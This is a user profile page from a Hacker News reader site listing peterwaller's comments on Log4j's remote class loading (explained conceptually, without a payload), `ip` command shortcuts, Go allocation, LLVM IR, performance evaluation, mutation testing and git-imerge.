Readit News logoReadit News
peterwaller commented on Log4j: Between a rock and a hard place   crawshaw.io/blog/log4j... · Posted by u/todsacerdoti
forrestthewoods · 4 years ago
Can someone explain exactly what bad thing someone can do with this exploit?

I understand passing a data to a second server and being able to exfiltrate environment vars. (Environment vars are evil.) But I feel like I’m missing a step. How does this let someone take over a machine? How can attacker upload and run their own binary that can actually do real damage?

peterwaller · 4 years ago
It lets the hacker take over the machine because there are strings which are interpreted as (IIUC, I am not a java engineer) variables within a class, and you can express a remote URL to load a class from, apparently (through something like (jndi://... ldap... URL), resulting in fetching code from somewhere and running it, in the service of writing a log message. This is apparently being exploited in the minecraft ecosystem by simply writing chat messages containing the full exploit, which gets executed by both servers and clients.
peterwaller commented on Linux maintains bugs: The real reason ifconfig on Linux is deprecated (2018)   blog.farhan.codes/2018/06... · Posted by u/pjmlp
djsumdog · 6 years ago
I really do not like the default UI in ip. You have to remember a lot of weird stuff to get useful information. The default listing is compressed, hard to read, and noisy. Then I saw someone who had these aliases:

    alias ipa 'ip -br -color a'
    alias ipl 'ip -br -color link'
Night and day! I try to not use the aliases because I'm often on servers without them, but the options for brief and color with the command to list adapters or links at the end it one all sys admins should memorize. It returns output that isn't terrible.

peterwaller · 6 years ago
Nice hint, thanks :)

According to the manpage, -color can be shortened to -c and link shortened to `l`, as `addr` can be shortened to `a`. -br stands for -brief, which knowing makes it easier to remember.

  ip -br -c a
  ip -br -c l
Now I need the aliases less.

peterwaller commented on Simple techniques to optimise Go programs   stephen.sh/posts/quick-go... · Posted by u/sjwhitworth
nhooyr · 7 years ago
Your example doesn't seem right. Doesn't the Get perform an allocation anyway because you access the value of the pointer and store it in a new variable b? It's very likely b will escape to the heap.
peterwaller · 7 years ago
I agree with nhooyr's analysis. The interface{} will anyway transparently "contain" a pointer-to-the-[]byte, in other words, the []byte value itself will be heap allocated.

(Note for anyone new to this that the "[]byte-value" - we say "the byte slice" - is a distinct thing from the "values stored-in-the-byte-slice", which is a heap allocated backing array)

peterwaller commented on Live coding a basic Go compiler with LLVM in 20 minutes   github.com/pwaller/go2ll-... · Posted by u/ngaut
loeg · 7 years ago
Minor nitpick: "%d" format string for i64 isn't quite right on most (all?) platforms.
peterwaller · 7 years ago
Thanks for pointing this out, I fixed it.
peterwaller commented on Live coding a basic Go compiler with LLVM in 20 minutes   github.com/pwaller/go2ll-... · Posted by u/ngaut
rawland · 7 years ago
Does a recording of this talk exist?

Ran `go run .` and it ended with:

   [...]
   go: downloading github.com/mewmew/float v0.0.0-20181121163145-c0f786d7da73    
   go: downloading github.com/pkg/errors v0.8.0                                  
   go: downloading github.com/rickypai/natsort v0.0.0-20180124032556-f194e6bd5b0c
   @$const_str = global [16 x i8] c"Hello world %d\0A\00"                        
                                                                                 
   declare void @printf(...)                                                     
                                                                                 
   define void @main() {                                                         
   0:                                                                            
       %0 = add i64 30, 12                                                       
       call void (...) @printf([16 x i8]* @$const_str, i64 %0)                   
       ret void                                                                  
   }                                                                             
   0>

peterwaller · 7 years ago
Unfortunately there isn't a recording, sorry!

What you're seeing is the LLVM IR for the program being printed. As another commenter noted, you can compile the program with make, which just runs `clang` on that IR.

peterwaller commented on Live coding a basic Go compiler with LLVM in 20 minutes   github.com/pwaller/go2ll-... · Posted by u/ngaut
awirth · 7 years ago
Note this uses golang.org/x/tools/go/packages and golang.org/x/tools/go/ssa to get to the go SSA AST and then generates some LLVM IR from that. It's not implementing a go parser or the transformation to SSA.
peterwaller · 7 years ago
Indeed, I had to take certain liberties in order to cram the talk into 20 minutes! I hope one of the takeaways was that you don't need to implement a parser to get started playing with this sort of thing.
peterwaller commented on Stabilizer: Statistically sound performance evaluation [pdf]   people.cs.umass.edu/~emer... · Posted by u/fanf2
titzer · 7 years ago
> why do those things have a (statistically significant?) impact in the first place?

In a word, caches. Not just the instruction / data cache, but also page faults and micro-architectural features like micro-op caches, instruction TLB entries, loop stream buffers, cache-line alignment, and aliasing in the branch predictor tables (which can also be thought of as caches).

peterwaller · 7 years ago
I suppose I was musing more along the lines of "why isn't this a solved problem". Clearly, it isn't an easy one or compilers would already take this into account and then the statistical variance would be reduced.
peterwaller commented on Stabilizer: Statistically sound performance evaluation [pdf]   people.cs.umass.edu/~emer... · Posted by u/fanf2
peterwaller · 7 years ago
Great, we can control for layout of code, heap, stack and other effects which mess with a performance measurement. However, why do those things have a (statistically significant?) impact in the first place? I guess that hints that with some engineering you could in principle get a speed boost by specifying the layout. "Worst case", you sample randomly and then pick the fastest arrangement, where it is statistically significant.

It could be that the problem arises when trying to measure very small speed increases (small relative differences => noise matters more). But in that case the fact that such a small speed increase is wiped out by random layout effects surely means that time would be better invested in finding a more performant layout?

peterwaller commented on 99% code coverage (2017)   rachelcarmena.github.io/2... · Posted by u/fagnerbrack
peterwaller · 7 years ago
Mutation testing is a neat idea I'd not heard of. Wonder how well it works in practice.

Someone's implemented a package for doing it with Go which looks good: https://github.com/zimmski/go-mutesting

peterwaller commented on Git-imerge: rebase/merge preserving history avoiding all-or-nothing   youtube.com/watch?v=FMZ2_... · Posted by u/peterwaller
peterwaller · 7 years ago
Just discovered this tool while doing a messy rebase, and can't believe it has had very little discussion I can find.

https://github.com/mhagger/git-imerge

No previous commentary on it so far on HN:

https://hn.algolia.com/?query=git%20imerge&dateRange=all

So, can anyone find any interesting discussion about this tool?

If you'd prefer reading rather than listening to the talk, here's an article which covers some of the same concepts:

https://wilsonmar.github.io/git-imerge/

The crux of it is that the tool does an efficient pairwise merge of all commits from the donor branch onto master. It can also be configured to run the test suite to detect conflicts.

Then you resolve conflicts in pairs of commits, which is only a small amount of work. The histories of your individual resolutions are preserved, so you can pause and resume the task.

p

u/peterwaller

KarmaCake day494June 25, 2012
About
Based near Manchester and Liverpool, UK.

p@pwaller.net

View Original